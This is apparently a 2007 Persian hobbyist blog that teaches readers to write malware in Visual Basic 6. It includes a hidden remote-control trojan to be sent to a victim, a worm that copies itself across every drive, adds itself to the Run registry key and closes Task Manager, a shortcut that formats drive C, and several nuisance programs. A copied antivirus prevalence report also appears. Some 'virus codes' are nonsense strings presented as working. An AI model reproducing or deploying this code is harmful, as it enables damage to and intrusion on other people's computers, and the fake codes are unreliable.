اما وادار کردن فرستادن پیغام "من کلید پیوندی رو فراموش کردم !" کار خیلی ساده ای هست... هکر باید آی دی یکی از ابزارها رو استراق سمع کنه که کار خیلی راحتیه. چون تمام ابزارهای بلوتوث این آی دی رو در اختیار همه ابزارهای دیگه ای که در برد قابل دسترسی (تا 100 متری) هستن میذاره !!

اين هم سورس كد يه اسنيفر بلوتوث هست كه فكر كنم خيلي بد

منبع : http://blog.websecurity.ir/

آموزش ساخت تروجان با ویژوال بیسیک/

كد هاي مخفي زير رو تصميم گرفتم upload كنم.

كافي است كد ها رو copy & paste كنيد وئ ارسال كنيد.

گرفتن ip:
pLz gIVe mE yOUr IP خاموش كردن سيستم طرف KhaM00SH.K0n.JONeMAdArET و اين كه معركست .گفتن پسورد MISHE.PASS.BEDI.BARAYE.HaCk ok ؟

منبع : simorgh-ev

آموزش ساخت تروجان با ویژوال بیسیک

با اين تروجان مي توانيد Cdrom قرباني را داخل وبيرون بياريد .
ومي توانيد براي قرباني Message بفرستيد
خوب ! شروع مي كنيم :
VB=(Visual basic)

VB را اجرا كنيد
و گزينه Standard Exe را انتخاب كنيد

معمولا هر تروجان از 2 قسمت تشكيل شده
1.server كه براي قرباني ميفرستيم
2. Client خودمان باهاش كار مي كنيم

خوب ! ما اول با هم Client را مي سازيم (دقت كنيد !)
نام Form را به frmClient تغيير دهيد

يكي از ابزاري كه نياز داريم Winsock Control 6.0 براي ارتباط با پورت سرور
براي انتخاب اين گزينه : Ctrl+t را فشار دهيد يا در منوي Project گزينه Components را انتخاب كنيد.صفحه به نام Components باز ميشود كه بايد Winsock Control 6.0 را داخل ان پيدا وانتخاب كنيد !

بعد از انتخاب Winsock Control 6.0 اگر به نوار سمت چپ نگاه كنين شكلي بايد اضافه شده باشه :

---( Client )—
حالا بايد گزينه هاي زير روي frmClient قرار بگيرد

. 5 تا Command
.. 2 تا textbox
... 1 وينشك
... label 1

بعد نام تمام اين گزينه ها را تغيير دهيد (همانند نامهاي زير )!!! دقت كنيد(مانند تغيير نام Form)

Command1 - cmdConnect
Command2 - cmdDisconnect
Command3 - cmdOpen
Command4 - cmdClose
Command5 - cmdMsg
Label1 - lblStatus
Text1 - txtIP
Text2 - txtMsg
Winsock1 - tcpClient

Caption گزينه ها را هم تغيير دهيد

خوب الان ديگه وقت وارد كردن Code هاست
بر روي كليد Connect(command1)دوبار كليك كنيد و باز شدن صفحه كد زير را وارد ان كنيد. دقت كنيد كد بايد بين 2 كاراكتر زير وارد شود!(روبروي كد ها نوع كار كد به انگليسي توضيح داده شده .از اونم مي توانيد كمك بگيريد !

Private Sub cmdConnect_Click()
End Sub
اين كد را بين اين 2 كاراكتر كپي كنيد .... بقيه هم به همين نوبت !

cmdConnect.Enabled = False ' disable the connect button
cmdDisconnect.Enabled = True ' eable the connect button
lblStatus.Caption = "Connecting" 'Show that you are trying to connect
If txtIP.Text = "" Then 'if IP textbox is empty then
MsgBox "Please enter a valid IP adress", vbCritical 'then give a messagebox
End If
tcpClient.Connect txtIP.Text, 1234 'connect to the IP you entered and on port 1234

در ا ينجا ما پورت را برابر 1234 قرار مي ديم
روي كليد (Disconnect)(command2) نيز دو بار كليك كنيد وكد زير را وارد صفحه كنيد

lblStatus.Caption = "Not Connected" 'Show that you are not connected
cmdDisconnect.Enabled = False 'Disable the disconnect button
cmdConnect.Enabled = True 'Enable the Connect button again
tcpClient.Close 'Close the connection

حالا بر روي شكل Winsock روي form دو بار كليك كنيد . وقتي صفحه كدها باز شد
بالاي صفحه .سمت چپ از منو گزينه Connect را انتخاب كنيد

وبين دو كاراكتر ايجاد شده در صفحه كدها.

Private Sub tcpClient_Connect()

End Sub

كد زير را وارد كنيد :

lblStatus.Caption = "Connected" 'Show that your connected to the Server

بريم سراغ كدها سي دي رام :

بر روي كليد Open cd-rom (command 3)دو بار كليك كنيد و بين دو كاراكتر ايجاد شده در صفحه كد . كد زير را وارد كنيد
tcpClient.SendData "opn" 'send this string to the server

همين كار رو با كليد Close cdrom (command 4) انجام بدين وكد زير را بين كاركترهاي ايجاد شده قرار بدين
tcpClient.SendData "cls" 'send this string to the server

..روي كليد send massage (command 5) نيز دوبار كيك كنيد و كد زير را وارد كنيد

tcpClient.SendData "msg" & txtMsg 'send this string to the server and the text in the textbox

((((( تبريك ميگم ؟!! شما الان Client را درست كردين )))))
فقط كافيه به صورت Exe كپي بشه !!
همين !!!! اميدوارم Save كردنشو بلد باشي !!

براي save :
File>make ……(project

نوبتم باشه . نوبت Server هست !!
بريييييييييييييم!
خوب يك Vb ديگه باز كنيد و Standard Exe را انتخاب كنيد
در اينجا هم به winsock نياز داريم . همون كاري كه براي اوردن winsockدر client انجام دادين . اينجا هم انجام بدين !

Winsockرا روي form قرار بدين .بعد نام فورم و وينشك را مطابق زير تغير بدين
Winsock = tcpServer
Form = frmServer
روي Form دو بار كليك كنيد و بين كاراكتر هاي ايجاد شده كد زير را كپي كنيد

me.hide
tcpServer.LocalPort = 1234 'listen on port 1234
tcpServer.Listen 'start listening

حالا روي Winsock دو بار كليك كنيد و از منوي سمت چپ گزينه connection requestرا انتخاب و بين دو كاراكتر ايجاد شده در صفحه كدها . كد زير را وارد كنيد

tcpServer.Close 'close to prevent any error
tcpServer.Accept requestID 'accept all incoming requests

دوباره با كليك بر روي Winsock از منوي سمت چپ صفحه كد باز شده گزينه errorرا انتخاب كنيد و بين كاراكترهاي ايجاد شده كد زير را كپي كنيد

On Error Resume Next 'to prevent any more error's
tcpServer.Close 'Close the connection
tcpServer.Listen 'listen again

حالا بايد يك module داشته باشيم براي آوردن آن :
Project> Add Module>open

حالا داخل Module زير را كپي كنيد

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long

Dim SendStr As String, ReturnStr As String

Public Function DoCommand(command As String, data As String) 'The server is performing a command
Select Case LCase(command) 'Convert the command to lowercase and do a select case
Case "opn" 'the client sends the string opn
SendStr = mciSendString("Set cdaudio door open", ReturnStr, 0, 0) 'open the cd-rom door
Case "cls" 'the client sends the string cls
SendStr = mciSendString("Set cdaudio door closed", ReturnStr, 0, 0) 'close the cd-rom door
Case "msg" 'The client wants a message box to be shown
MsgBox data, vbInformation, "Information" ' Display the message to the server as a 'information messagebox
End Select 'end the select case
End Function 'end the function

Module را ببنديد
و روي Form دو بار كليك كنيد و كد زير را بالاي صفحه (دقت كنيد .بالا !) كپي كنيد

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA"( ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long

دوباره روي Form كليك كنيد و كد زير را به صفحه كدها اضافه كنيد

Private Sub tcpServer_DataArrival(ByVal bytesTotal As Long)
Dim vardata As String
Dim strdata As String ' Variable for holding the data received
Dim cmddata As String * 3 ' This is for holding the command the server sent
tcpServer.GetData strdata ' Get the data sent
cmddata = Left(strdata, 3) ' This is the command the server sent
vardata = Right(strdata, Len(strdata) - 3) ' This is the variable data
DoCommand cmddata, vardata ' This function is in the commands module
End Sub

اينم تمام شد حالا save كنيد

خوب اينم از سرور ( تبريك مي گم . شما يك Trojan نوشتيد !؟ )

حالا كافيه سرور را براي شخص مورد نظر بفرسين و پس از اطمينان از اجراي ان در كامپيوترش با وارد كردن ip او در Client به سيستم او وصل بشين و .........!؟

البته اينو بگم كه سرور قابليت اينو كه هر بار ويندوز لود ميشه . اجرا بشه را نداره
و كارايي اين Trojan هم محدوده (open & close cdrom…Send message

+ نوشته شده در پنجشنبه بیست و دوم آذر 1386ساعت 9:26 بعد از ظهر توسط mahyar |

کد ویروس باحال

این ویروس برای پور کردن کارت گرافیک است؟

c/windows/system32/jefo/display/memory/full

این ویروس را هم در notepad با پسوند bat سیو کنید.

این ویروس کارش حرف نداره قسمت ریجستری ویندوزرو میترکونه ؟

یعنی دیگه هچ برنامه ای نصب یا پاک نمیشه.

Disabled regedit from:grouap pilicy

این ویروس را در notepad با پسوند fifa 2006.bat سیو کنید؟

این ویروس روی هر سیستمی اجرا بشه؟

با هر بار وصل شدن به اینترنت کامپیوتر بعد از ۸۰ ثانیه ریستارت میشود.

Turn on-b-and defulat when connect

این ویروس را هم در notepad با پسوند fifa 2006 .bat سیو کنید؟

این ویروس در internet explore فیلتر گذاری میکنه ؟

و باعث از کار انداختن اون میشه و دیگه نمیشه به هیچ سایتی رفت .

pouped-blocked-web-exploure-online&offline

این ویروس را هم در notepad با پسوند bat سیو کند؟

این ویروس سی پی یو فرد را می سوزنه؟

cpu_567hjkblaster

این ویروس را هم در notepad با پسوند bat سیو کند؟

+ نوشته شده در پنجشنبه بیست و دوم آذر 1386ساعت 9:14 بعد از ظهر توسط mahyar |

تخریب کل هارد

+ نوشته شده در پنجشنبه بیست و دوم آذر 1386ساعت 9:12 بعد از ظهر توسط mahyar |

Midnight Worm

توجه توجه

یه کرمه جدید

ساخته دستان این جانب خدمت گذار عرصه ویروس نویسان

ویژگی ها:

۱.در چند جای نا مشخص خودشو کپی و مخفی می کنه.

۲.در هر صورت شروع بکار میکنه (تا سيستم بالا اومد . . .) حتي تو safe mode .

۳.شروع به خوردن دسکتاپ می کنه تا زمانی که سیستم روشنه.

۴.تنها راه توقف - تعویض ویندوز - یا فرمت کردن هارد .

۵.قربانی قادر به باز کردن (task manager , my computer, my document , internet explorer,

windows media player, yahoo messenger ) و . . . نیست.

۶.و . . .

برای دریافت نظر بدهید

+ نوشته شده در شنبه دهم آذر 1386ساعت 3:42 بعد از ظهر توسط mahyar |

شايعترين ويروس ها در ماه ژانويه

شايعترين ويروس ها در ماه ژانويه

Panda Software، فهرست مهمترين ويروس ها و كدهاي مخرب رايانه اي كشف شده ماه ژانويه، در جهان و نيز در كشور جمهوري اسلامي ايران را منتشر كرد.
بنا بر اين فهرست، مهمترين ويروس رايانه اي كشف شده جهان در ماه ژانويه، كد نام آشناي Sdbot.ftp مي باشد كه پيشتر، عنوان شايعترين ويروس سال 2006 ميلادي را نيز كسب كرده بود. اين كد مخرب با استفاده از نقاط آسيب پذير خاص، در سيستم ها نفوذ كرده و گونه هايي از خانواده كرم هاي رايانه اي Sdbot را در آنها داونلود مي نمايد. مهمترين عملكرد اين كد، ايجاد اختلال جدي در فعاليت شبكه ها و سيستم ها مي باشد.
اما عنوان شايعترين و مهمترين ويروس ماه ژانويه در ايران به يك تروژان كاملاً جديد با نام VB.PA اختصاص يافت. اين تروژان خطرناك با نفوذ در رايانه ها و شبكه ها، به سرقت اطلاعات حساس و محرمانه ذخيره و يا وارد شده توسط كاربران پرداخته و سبب ناپديد شدن بسياري از فايل ها و اطلاعات موجود در سيستم مي گردد.

فهرست شايعترين ويروس هاي ماه ژانويه 2007 را در زير مشاهده مي كنيد:

در سرتاسر جهان:

عنوان درصد شيوع در جهان
1- كرم رايانه اي W32/Sdbot.ftp 1.96
2- تروژان Torpig.A 1.46
3- كرم Puce.E 1.17
4- تروژان Abwiz.A 1.16
5- تروژان Bck/PcClient.DU 0.99
6- كرم رايانه اي W32/Brontok.H 0.94
7- تروژان QQPass.JZ 0.94
8- كرم W32/Netsky.P 0.87
9- كرم W32/Nuwar.B 0.68
10- كرم W32/Bagle.HX 0.63

در جمهوري اسلامي ايران:

عنوان درصد شيوع در ايران
1- تروژان VB.PA 13.9
2- كرم رايانه اي W32/Brontok.H 11.06
3- كرم W32/Jeefo.A 4.68
4- كرم W32/Wukill.A 3.83
5- تروژان Perlovga.A 3.40
6- كرم W32/Rontok.B 3.40
7- تروژان Dropper.UN 2.98
8- تروژان Perlovga.B 2.98
9- كرم W32/Sdbot.ftp 2.98
10- تروژان Bck/ShellStart.B 2.13

نكته قابل توجه از ديدگاه كارشناسان امنيتي اين است كه علي رغم توجه بيشتر به ملاحظات امنيتي از طرف كاربران، طراحان كدهاي مخرب و حملات اخير آنها بسيار فعال و پويا هستند. از اين گذشته با نگاهي به فهرست شايعترين كدها كه تروژان ها سهم عمده اي از آن را دارا هستند، ميتوان نتيجه گرفت كه حمله هاي مخرب جديد بيشتر با هدف سرقت اطلاعات مالي و در نهايت سرقت پول، كاربران رايانه و اينترنت را تهديد مي كنند.
كليه كاربران رايانه مي توانند براي اطمينان از عدم آلودگي سيستم هاي خود به كدهاي مخرب فوق و ساير آلودگي هاي رايانه اي، از برنامه كاملاً رايگان و آنلاين Panda ActiveScanبه آدرس www.pandasoftware.com/activescan استفاده كنند.
براي دريافت اطلاعات كامل در خصوص بدافزارهاي فوق و نحوه عملكرد تخريبي آنها به آدرس www.pandasoftware.com/virus_info/encyclopedia مراجعه فرماييد

+ نوشته شده در شنبه دهم آذر 1386ساعت 3:28 بعد از ظهر توسط mahyar |

ويروس ساده ولي خطرناك

ميخوام نوشتن يه ويروس ساده ولي خطرناك رو بهتون ياد بدم. اين ويروس چيز سختي نيست ولی خيلي خطرناكه و باعث میشه تنها با یک کلیک کل اطلاعات موجود در درايوى كه شما انتخاب مىكنيد پاك بشه .

روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد. يه صفحه باز ميشه در اون بنويسيد: Format C:/Autotest سپس Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد.

سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد. خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين. اگه خواستين بفهمين چي ميشه به جاي Format C:/autotest بنويسيد Format a:/autotest و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خود قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد

+ نوشته شده در شنبه بیست و ششم آبان 1386ساعت 7:41 قبل از ظهر توسط mahyar |

پاسخ به سوالات

آقا یا خانوم ش ن تعدادی از سورس کدها مربوط به نرم افزار برنامه سازی ویژوال بیسیک میباشد.

تعدادی دیگر از کد ویروس ها که در پست مربوط اشاره شده است در NotePad نوشته می شوند.

حال اگر مشکل خاصی در رابطه با این موضوعات دارید با این شماره تماس حاصل فرمایید :

۰۹۱۱۹۹۲۱۷۲۹

منتظر نظرات و پیشنهادات شما هستیم.

+ نوشته شده در شنبه بیست و ششم آبان 1386ساعت 7:28 قبل از ظهر توسط mahyar |

گام به گام با ویروس ها

سلام دوباره عرض می کنم خدمت همه دوستان عزيز

و اما ويروس اين دفعه:

فکر کنم تقريبا همتون اون ويروس لعنتی را که يه دفعه ظاهر میشه و شما رو دعوت با راه نيک ميکنه و اگه گوش ندين موس رو توی قفس می اندازه را ديده باشيد .راستش را بخاين منم خيلی دنبالش بودم تا بالاخره تونستم با تحقيق فراوون از اين ور و اون ور اونو برای شما اماده کنم.

البته اين کدا فقط مربوط به mouse cage و يا قفس موسه ولی می تونم بگم اگه مطالب اين وبلاگ رو مرور کنين می تونين خودتون اين ويروسو کامل بنويسين

مواد مورد نیاز: یه دکمه

بريم سراغ کدا

Private Type RECT

left As Long

top As Long

right As Long

bottom As Long

End Type

Private Type POINT

x As Long

y As Long

End Type

Private Declare Sub ClipCursor Lib "user32" (lpRect As Any)

Private Declare Sub GetClientRect Lib "user32" (ByVal hWnd As Long, lpRect As RECT)

Private Declare Sub ClientToScreen Lib "user32" (ByVal hWnd As Long, lpPoint As POINT)

Private Declare Sub OffsetRect Lib "user32" (lpRect As RECT, ByVal x As Long, ByVal y As Long)

Private Sub Form_Load()

'Limits the Cursor movement to within the form.

Dim client As RECT

Dim upperleft As POINT

'Get information about our wndow

GetClientRect Me.hWnd, client

upperleft.x = client.left

upperleft.y = client.top

'Convert window co?rdinates to screen co?rdinates

ClientToScreen Me.hWnd, upperleft

'move our rectangle

OffsetRect client, upperleft.x, upperleft.y

'limit the cursor movement

ClipCursor client

Command1.Caption = " disable"

End Sub

Private Sub Command1_Click()

'Releases the cursor limits

ClipCursor ByVal 0&

End Sub

Private Sub Form_Unload(Cancel As Integer)

'Releases the cursor limits

ClipCursor ByVal 0&

End Sub

و اما توضيح برنامه:

است. کاراین تابع اینه که نشانگر موس را در ClipCursor دوستان اساس اين برنامه بر پايه تابعی بنام

یک مستطیل محبوس میکنه

ما در پاراگرافهای اول این مستطيل رو فرم خودمون در نظر گرفتيم و این و سرانجام در رویداد کلید 1کدهایی که سبب وغیر فعال شدن برنامه میشن رو قرار میدیم تا خودتون گیر نیفتین .(البته اگه خواستين از این برنامه بعنوان ویروس استفاده کنین کلید 1 نا مرئی کنين)

البته گفتنیه که اگه تابع به مشکل بر بوخوره عدد 0 رو بر میگردونه که ما با همین روش کلید 1 را برای غیر فعال سازی برنامه طراحی میکنیم در واقع با فشردن کلید 1 به تابع عدد 0 رو نسبت داده و برنامه رو غیر فعال می کنیم.

یادتون نره ویروستون نیاز به کلید داره**

****************************************************************

+ نوشته شده در شنبه دوازدهم آبان 1386ساعت 6:45 قبل از ظهر توسط mahyar |

ویروس

به جرات میتونم بگم ویروس این دفعه یکی از شیرین ترین و جذاب ترین ویروسای این وبلاگه!خودم شخصا خیلی دوستش دارم

اساس کار این یکی هم مثل بقیه ویروسام خیلی سادست :فقط رزولوژن صفحه رو تغیییر میده و اساس کار اونم به timer وابستس

موارد مورد نیاز

timer (اسم اونرا لازم نیست تغییر بدین)که interval اون ۲۰۰۰ میباشد

اینم از کدای برنامه:

Option Explicit
Const WM_DISPLAYCHANGE = &H7E
Const HWND_BROADCAST = &HFFFF&
Const EWX_LOGOFF = 0
Const EWX_SHUTDOWN = 1
Const EWX_REBOOT = 2
Const EWX_FORCE = 4
Const CCDEVICENAME = 32
Const CCFORMNAME = 32
Const DM_BITSPERPEL = &H40000
Const DM_PELSWIDTH = &H80000
Const DM_PELSHEIGHT = &H100000
Const CDS_UPDATEREGISTRY = &H1
Const CDS_TEST = &H4
Const DISP_CHANGE_SUCCESSFUL = 0
Const DISP_CHANGE_RESTART = 1
Const BITSPIXEL = 12
Private Type DEVMODE
    dmDeviceName As String * CCDEVICENAME
    dmSpecVersion As Integer
    dmDriverVersion As Integer
    dmSize As Integer
    dmDriverExtra As Integer
    dmFields As Long
    dmOrientation As Integer
    dmPaperSize As Integer
    dmPaperLength As Integer
    dmPaperWidth As Integer
    dmScale As Integer
    dmCopies As Integer
    dmDefaultSource As Integer
    dmPrintQuality As Integer
    dmColor As Integer
    dmDuplex As Integer
    dmYResolution As Integer
    dmTTOption As Integer
    dmCollate As Integer
    dmFormName As String * CCFORMNAME
    dmUnusedPadding As Integer
    dmBitsPerPel As Integer
    dmPelsWidth As Long
    dmPelsHeight As Long
    dmDisplayFlags As Long
    dmDisplayFrequency As Long
End Type
Private Declare Function EnumDisplaySettings Lib "user32" Alias "EnumDisplaySettingsA" (ByVal lpszDeviceName As Long, ByVal iModeNum As Long, lpDevMode As Any) As Boolean
Private Declare Function ChangeDisplaySettings Lib "user32" Alias "ChangeDisplaySettingsA" (lpDevMode As Any, ByVal dwFlags As Long) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function GetDeviceCaps Lib "gdi32" (ByVal hdc As Long, ByVal nIndex As Long) As Long
Private Declare Function CreateDC Lib "gdi32" Alias "CreateDCA" (ByVal lpDriverName As String, ByVal lpDeviceName As String, ByVal lpOutput As String, ByVal lpInitData As Any) As Long
Private Declare Function DeleteDC Lib "gdi32" (ByVal hdc As Long) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Dim OldX As Long, OldY As Long, nDC As Long
Sub ChangeRes(X As Long, Y As Long, Bits As Long)
    Dim DevM As DEVMODE, ScInfo As Long, erg As Long, an As VbMsgBoxResult
    'Get the info into DevM
    erg = EnumDisplaySettings(0&, 0&, DevM)
    'This is what we're going to change
    DevM.dmFields = DM_PELSWIDTH Or DM_PELSHEIGHT Or DM_BITSPERPEL
    DevM.dmPelsWidth = X 'ScreenWidth
    DevM.dmPelsHeight = Y 'ScreenHeight
    DevM.dmBitsPerPel = Bits '(can be 8, 16, 24, 32 or even 4)
    'Now change the display and check if possible
    erg = ChangeDisplaySettings(DevM, CDS_TEST)
    'Check if succesfull
    Select Case erg&
        Case DISP_CHANGE_RESTART

        Case DISP_CHANGE_SUCCESSFUL
            erg = ChangeDisplaySettings(DevM, CDS_UPDATEREGISTRY)
            ScInfo = Y * 2 ^ 16 + X
            'Notify all the windows of the screen resolution change
            SendMessage HWND_BROADCAST, WM_DISPLAYCHANGE, ByVal Bits, ByVal ScInfo

        Case Else
            MsgBox "Mode not supported", vbOKOnly + vbSystemModal, "Error"
    End Select
End Sub

Private Sub Timer1_Timer()
Dim nDC As Long
    'retrieve the screen's resolution
    OldX = Screen.Width / Screen.TwipsPerPixelX
    OldY = Screen.Height / Screen.TwipsPerPixelY
    'Create a device context, compatible with the screen
    nDC = CreateDC("DISPLAY", vbNullString, vbNullString, ByVal 0&)
    'Change the screen's resolution
    ChangeRes 640, 480, GetDeviceCaps(nDC, BITSPIXEL)

End Sub

و اما توضیح(دقت کنید توضیح کامل هر قسمت در میان کدا وجود داره)

اساس این برنامه(همون ویروس خودمونو میگم) برپایه تابع EnumDisplaySettings کار میکنه .در واقع با این تابع شما میتونید مشخصات تصویر از وضوح گرفته تا تعداد رنگ را در کنترل بگیرین(یعنی کاری که ما میکنیم)

قسمت قشنگ کار از اونجایی شروع میشه که ما باtimer هامون مرتبا این تابع را بکار میندازیم ووضوح صفحه را تغییر میدیم

نکات

۱-با اینکه کدا یکم در همه ولی با کپی کردن درست میشن

۲-اگه این ویروسم با مطالب قبلی قاطی کنین خواهید دید که چه معجزاتی از دستون بر میاد

۳-اصلا انتظار ندارم وقت باارزشتون رو برای نظر دادن صرف کنین ولی باید بگم نظرات شما و محبتتون بزرگترین عامل برگشتم بود هیچ وقت فراموشتون نمیکنم فراموشم نکنید

+ نوشته شده در شنبه دوازدهم آبان 1386ساعت 6:43 قبل از ظهر توسط mahyar |

hey run it

سلام رفقا!

روزگار چطور میگذره؟خوب هست یا نه

ویروس ایندفه (نمیدونم چرا دلم راضی نمیشه به اینم بگم ویروس!!شاید بگم بچه ویروس بهتر باشه)

در عین سادگی خیلی باحاله! یه دفعه ۱۰-۲۰ تا برنامه رو باز میکنه و نمیشه بستشون!!

در ضمن خودکارم هستو در اولین اجرا خودش رو تو رجیستری کپی میکنه.

*********************************************************************

خب بریم سراغ کدا:(این برنامه یه timer میخواد)

Private Sub Form_Load()
Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"

App.TaskVisible = False
Me.Hide
Timer1.Interval = 2000

End Sub

Private Sub Timer1_Timer()
Call Shell("rundll32.exe shell32.dll , Control_RunDLL ")
Call Shell("rundll32.exe shell32.dll , Control_RunDLL acces.cpl, ,1")
Call Shell("rundll32.exe shell32.dll , Control_RunDLL acces.cpl, ,3")
Call Shell("rundll32.exe shell32.dll , Control_RunDLL acces.cpl, ,2")
Call Shell("rundll32.exe shell32.dll , Control_RunDLL appwiz.cpl , ,1")
Call Shell("rundll32.exe shell32.dll , Control_RunDLL acces.cpl, ,4")
Call Shell("rundll32.exe shell32.dll , Control_RunDLL appwiz.cpl , ,2")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL main.cpl @1 ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL modem.cpl ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL ncpa.cpl ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL mmsys.cpl ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL telephon.cpl")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL telephon.cpl")
Call Shell("rundll32.exe shell32.dll , Control_RunDLL findfast.cpl ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL intecpl.cpl, , 0 ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL intl.cpl, , 0 ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL intl.cpl, , 2 ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL intl.cpl, , 1 ")
Call Shell("rundll32.exe shell32.dll ,Control_RunDLL joy.cpl ")

End Sub

توضیح****************************************************************

دوستان دستور shell در ویژوال بیسیک خودمونی که بخواییم بگیم برای فراخوانی (همون اجرای خودمون) برنامه ها (انواع فایل اجرایی و غیره...) بکار میره و این همون کاریه که کردیم فقط این برنامه ها رو به تعداد زیاد و بطور مستمر انجام دادیم و این طور شد که یه برنامه ساده به یه ویروس کاربردی(ولی همچنان ساده) تبدیل شد

قسمت form load هم که واستون اشناست؟

منتظر نظراتون هستم

+ نوشته شده در شنبه دوازدهم آبان 1386ساعت 6:40 قبل از ظهر توسط mahyar |

این ویروس واقعا فسقلیه ولی من عاشقشم

بدون هیچ حرف اضافه ای

بریم سراغ کدا(این ویروس یه Timer میخواد)

Private Sub Timer1_Timer()
SendKeys "http://www.m-p-s.blogfa.com/", 1
End Sub

Private Sub Form_Load()
Timer1.Interval = 1000
End Sub

+ نوشته شده در شنبه دوازدهم آبان 1386ساعت 6:27 قبل از ظهر توسط mahyar |

این دفعه یه کرم مامانی واستون دارم

نحوه عملکرد: این کرم در اولین اجرا شروع میکنه به ساختن پوشه در تموم درایو ها (حتی فلاپی و فلش مموری ها) و کپی کردن خودش توی اون پوشه ها و اجرا کردن اونا! البته خوکارم هست و یه سری برنامه که به کاربر بیچاره ممکنه کمکی بکنه رو هم بلافاصله میبنده!!

نتیجه: پر شدن فضای هارد - تعدد پوشه ها در درایو هاـ پر شدن فضای رم- در اومدن پدر قربانی

مواد مورد نیاز:(آدم یاد برنامه خانواده میفته!) ۱۸ تا timerـ ۸ تا textbox

خب بریم سراغ کدا"

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SetForegroundWindow Lib "user32" (ByVal hwnd As Long) As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private Declare Function CreateDirectory Lib "kernel32" Alias "CreateDirectoryA" (ByVal lpPathName As String, lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long
Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Sub Form_Load()
On Error Resume Next
CopyFile App.Path & "\New Folder.exe", "C:\WINDOWS\system32\New Folder.exe", 0
Call Shell("C:\WINDOWS\system32\New Folder.exe")
App.TaskVisible = False
Me.Hide

Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"

Timer1.Interval = 2000
Timer2.Interval = 1000
Timer3.Interval = 1000
Timer4.Interval = 1000
Timer5.Interval = 1000
Timer6.Interval = 1000
Timer7.Interval = 1000
Timer8.Interval = 1000
Timer9.Interval = 1000
Timer10.Interval = 700
Timer11.Interval = 700
Timer12.Interval = 700
Timer13.Interval = 700
Timer14.Interval = 400
Timer15.Interval = 400
Timer16.Interval = 1000
Timer17.Interval = 60000
Timer18.Interval = 1
End Sub

Private Sub Timer16_Timer()
On Error Resume Next
Dim Security As SECURITY_ATTRIBUTES
Ret& = CreateDirectory(Text8.Text, Security)
CopyFile App.Path & "\New Folder.exe", Text8.Text + "\New Folder.exe", 0

End Sub
Private Sub Timer1_Timer()
Randomize Timer
Text1.Text = Int(Rnd * 10000) + "1"
End Sub

Private Sub Timer10_Timer()
Text6.Text = Text2
End Sub

Private Sub Timer11_Timer()
Text6.Text = Text3
End Sub

Private Sub Timer12_Timer()
Text7.Text = Text4
End Sub

Private Sub Timer13_Timer()
Text7.Text = Text5
End Sub

Private Sub Timer14_Timer()
Text8.Text = Text6
End Sub

Private Sub Timer15_Timer()
Text8.Text = Text7
End Sub

Private Sub Timer17_Timer()
On Error Resume Next
Call Shell(Text8.Text)
End Sub

Private Sub Timer18_Timer()
On Error Resume Next
Dim handel As Long
Dim hande2 As Long
Dim hande3 As Long
Dim hande4 As Long
handel = FindWindow(vbNullString, "system configuration utility")
hande2 = FindWindow(vbNullString, "WINDOWS TASK MANAGER")
hande3 = FindWindow(vbNullString, "system32")
hande4 = FindWindow(vbNullString, "run")

If handel <> 0 Then
SetForegroundWindow handel
SendKeys "%{f4}", 1
End If

If hande2 <> 0 Then
SetForegroundWindow hande2
SendKeys "%{f4}", 1

End If

If hande3 <> 0 Then
SetForegroundWindow hande3
SendKeys "%{f4}", 1

End If

If hande4 <> 0 Then
SetForegroundWindow hande4
SendKeys "%{f4}", 1

End If

End Sub

Private Sub Timer2_Timer()
Text2.Text = "c:\" + Text1.Text
End Sub

Private Sub Timer3_Timer()
Text3.Text = "e:\" + Text1.Text
End Sub

Private Sub Timer4_Timer()
Text4.Text = "g:\" + Text1.Text
End Sub

Private Sub Timer5_Timer()
Text3.Text = "f:\" + Text1.Text
End Sub

Private Sub Timer6_Timer()
Text2.Text = "d:\" + Text1.Text
End Sub

Private Sub Timer7_Timer()
Text4.Text = "h:\" + Text1.Text
End Sub

Private Sub Timer8_Timer()
Text5.Text = "k:\" + Text1.Text
End Sub

Private Sub Timer9_Timer()
Text5.Text = "a:\" + Text1.Text
End Sub

***-----------------------------------------------------------------------------------------------*****

